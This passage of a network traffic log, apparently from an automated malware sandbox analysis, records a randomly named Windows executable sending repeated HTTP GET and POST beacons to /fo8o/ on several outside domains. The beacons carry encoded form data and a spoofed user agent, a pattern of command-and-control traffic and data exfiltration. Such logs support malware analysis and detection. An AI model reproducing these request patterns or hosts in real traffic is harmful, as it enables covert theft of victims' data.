                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Thu, 19 Dec 2024 06:51:06 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 315
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.549819116.50.37.244805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:51:08.038743973 CET530OUTGET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Host: www.goldenjade-travel.com
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Dec 19, 2024 07:51:09.555674076 CET492INHTTP/1.1 404 Not Found
                                                                                          Content-Type: text/html; charset=us-ascii
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Thu, 19 Dec 2024 06:51:09 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 315
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.54985585.159.66.93805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:51:23.667551041 CET783OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.magmadokum.com
                                                                                          Origin: http://www.magmadokum.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 209
                                                                                          Referer: http://www.magmadokum.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 48 43 46 59 72 4d 39 61 51 75 33 56 78 63 4f 51 38 59 6d 39 5a 44 32 48 32 7a 46 43 44 33 67 72 48 6b 72 34 47 4d 3d
                                                                                          Data Ascii: UT5tTdKX=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0HCFYrM9aQu3VxcOQ8Ym9ZD2H2zFCD3grHkr4GM=


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.54986485.159.66.93805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:51:26.321504116 CET803OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.magmadokum.com
                                                                                          Origin: http://www.magmadokum.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 229
                                                                                          Referer: http://www.magmadokum.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 76 4f 58 6c 37 79 54 7a 57 4a 78 6b 30 62 6d 52 59 7a 74 32 69 4e 73 77 7a 43 76 35 30 4d 4d 4a 7a 30 64 67 68 67
                                                                                          Data Ascii: UT5tTdKX=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5vOXl7yTzWJxk0bmRYzt2iNswzCv50MMJz0dghg


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.54987085.159.66.93805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:51:28.988245010 CET1820OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.magmadokum.com
                                                                                          Origin: http://www.magmadokum.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 1245
                                                                                          Referer: http://www.magmadokum.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 73 73 6d 71 37 43 70 61 30 37 78 54 57 4b 4d 33 48 64 70 76 79 6b 44 69 48 69 48 36 48 4c 46 69 4b 68 63 65 38 72 2b 54 30 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6d 4d 4b 2f 55 2f 4a 4d 4f 73 39 61 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 [TRUNCATED]
                                                                                          Data Ascii: UT5tTdKX=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMassmq7Cpa07xTWKM3HdpvykDiHiH6HLFiKhce8r+T0YwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXmMK/U/JMOs9aQIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBoORpWPOJduHh5uXpVuvEsxDtqlVHzP4C83V2BciD6jh4S6IfuEsb550muWnceqjpZzyLMUjqSspZqRKhzaqChBo0BSgiACGCO3NiS+toURxH1cbr4Asre4PUxzDj75BwPzFCgslxA5RscTk4WEk+bCRmOaNg30J49XkrSmC4X/iGbLstKZ/+TwHfwDWCbdQ6zApgNjvoTYeR8Hw1dGOQFcFPta/FQ2Stmx9P86MQwPjea3KS4PVUJS0mUBOaht/UPFEay20NWWi+fqfZG/d2d5TndsbuTUZ1XkAQwkco/3d1C4d3IIm85c+Isp2iJHtRPm0PCDOGoFuWr9zbjbI6mC2oo+9mtb82rZwgxWvBcEqSIoPgX68mpMXfB+GxS8wiAVIg6LcZ43JTeSUmEdWOS9n2l23pEkKGCckJdweFIbk2pBKrxDA4pPfGW5AuMvs+uRkDTNdlWS/4bXYqJV1TJ/SsX72SRqzRbaJd6Z0105PebcTu+euDbNQuFvyY1FEwvx+MGzmrDE747BBulIm5nTvGgehCJqH8jghMMedUadcLcHLEgKBZebl+VoSnbQN7j2txb1iNWNBZagGJ2RM [TRUNCATED]


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.54987785.159.66.93805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:51:31.635165930 CET523OUTGET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Host: www.magmadokum.com
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Dec 19, 2024 07:52:32.959995985 CET194INHTTP/1.0 504 Gateway Time-out
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.54998591.195.240.94805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:52:38.389144897 CET786OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.rssnewscast.com
                                                                                          Origin: http://www.rssnewscast.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 209
                                                                                          Referer: http://www.rssnewscast.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 4d 38 45 65 4e 56 32 71 43 59 59 32 64 72 47 6d 77 6a 52 56 68 44 61 6e 55 34 4d 5a 48 58 68 58 54 42 65 30 50 30 3d
                                                                                          Data Ascii: UT5tTdKX=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pM8EeNV2qCYY2drGmwjRVhDanU4MZHXhXTBe0P0=
                                                                                          Dec 19, 2024 07:52:39.663331032 CET707INHTTP/1.1 405 Not Allowed
                                                                                          date: Thu, 19 Dec 2024 06:52:39 GMT
                                                                                          content-type: text/html
                                                                                          content-length: 556
                                                                                          server: Parking/1.0
                                                                                          connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.54998691.195.240.94805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:52:41.041213036 CET806OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.rssnewscast.com
                                                                                          Origin: http://www.rssnewscast.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 229
                                                                                          Referer: http://www.rssnewscast.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 76 69 33 48 77 37 49 33 32 49 4e 77 52 75 71 59 69 72 31 39 44 73 35 46 2f 48 61 6e 6e 55 34 52 42 43 41 4a 64 66
                                                                                          Data Ascii: UT5tTdKX=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBvi3Hw7I32INwRuqYir19Ds5F/HannU4RBCAJdf
                                                                                          Dec 19, 2024 07:52:42.316906929 CET707INHTTP/1.1 405 Not Allowed
                                                                                          date: Thu, 19 Dec 2024 06:52:42 GMT
                                                                                          content-type: text/html
                                                                                          content-length: 556
                                                                                          server: Parking/1.0
                                                                                          connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          11192.168.2.54998791.195.240.94805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:52:43.697117090 CET1823OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.rssnewscast.com
                                                                                          Origin: http://www.rssnewscast.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 1245
                                                                                          Referer: http://www.rssnewscast.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 7a 4c 67 61 41 33 54 2f 58 6f 6d 65 44 6d 76 4b 79 68 45 33 61 76 52 31 66 53 45 79 67 58 6e 59 6b 47 6d 6c 67 4e 56 51 65 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 50 65 63 43 6a 7a 4b 39 73 77 44 57 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 [TRUNCATED]
